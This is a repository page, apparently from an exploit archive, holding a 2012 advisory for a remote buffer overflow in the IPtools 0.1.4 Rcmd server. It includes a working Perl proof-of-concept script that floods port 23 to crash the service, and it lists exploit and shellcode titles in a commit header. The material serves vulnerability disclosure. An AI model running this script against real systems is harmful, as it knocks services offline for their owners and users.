880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
61 lines
No EOL
2.1 KiB
Perl
Executable file
61 lines
No EOL
2.1 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/51312/info
|
|
|
|
IPtools is prone to a remote buffer-overflow vulnerability because it fails to bounds-check user-supplied input before copying it into an insufficiently sized memory buffer.
|
|
|
|
Exploiting this vulnerability may allow remote attackers to execute arbitrary code in the context of the affected device. Failed exploit attempts will result in a denial-of-service condition.
|
|
|
|
IPtools 0.1.4 is vulnerable; other versions may also be affected.
|
|
|
|
Title: IpTools(Tiny TCP/IP server) - Rcmd Remote Overflow Vulnerability
|
|
|
|
Software : IpTools(Tiny TCP/IP server)
|
|
|
|
Software Version : 0.1.4
|
|
|
|
Vendor: http://iptools.sourceforge.net/iptools.html
|
|
|
|
Class: Boundary Condition Error
|
|
|
|
CVE:
|
|
|
|
Remote: Yes
|
|
|
|
Local: No
|
|
|
|
Published: 2012-01-07
|
|
|
|
Updated:
|
|
|
|
Impact : High
|
|
|
|
Bug Description :
|
|
IPtools is a set of small tiny TCP/IP programs includes Remote command server(not a telnet server, Executable file: Rcmd.bat), etc.
|
|
And the remote command server would bind tcp port 23, but it does not validate the command input size leading to a Denial Of Service
|
|
flaw while sending more than 255 characters to it.
|
|
|
|
POC:
|
|
#-------------------------------------------------------------
|
|
#!/usr/bin/perl -w
|
|
#IpTools(0.1.4) - Rcmd Remote Crash PoC by demonalex (at) 163 (dot) com [email concealed]
|
|
#-------------------------------------------------------------
|
|
use IO::Socket;
|
|
$remote_host = '127.0.0.1'; #victim ip as your wish
|
|
$remote_port = 23; #rcmd default port number
|
|
$sock = IO::Socket::INET->new(PeerAddr => $remote_host, PeerPort => $remote_port,
|
|
Timeout => 60) || die "$remote_host -> $remote_port is closed!\n";
|
|
$sock->recv($content, 1000, 0);
|
|
$count=0;
|
|
while($count<=255){
|
|
$sock->send("a", 0);
|
|
$count++;
|
|
}
|
|
$sock->send("\r\n", 0);
|
|
$sock->recv($content, 1000, 0);
|
|
$sock->shutdown(2);
|
|
exit(1);
|
|
#-------------------------------------------------------------
|
|
|
|
Credits : This vulnerability was discovered by demonalex (at) 163 (dot) com [email concealed]
|
|
mail: demonalex (at) 163 (dot) com [email concealed] / ChaoYi.Huang (at) connect.polyu (dot) hk [email concealed]
|
|
Pentester/Researcher
|
|
Dark2S Security Team/PolyU.HK |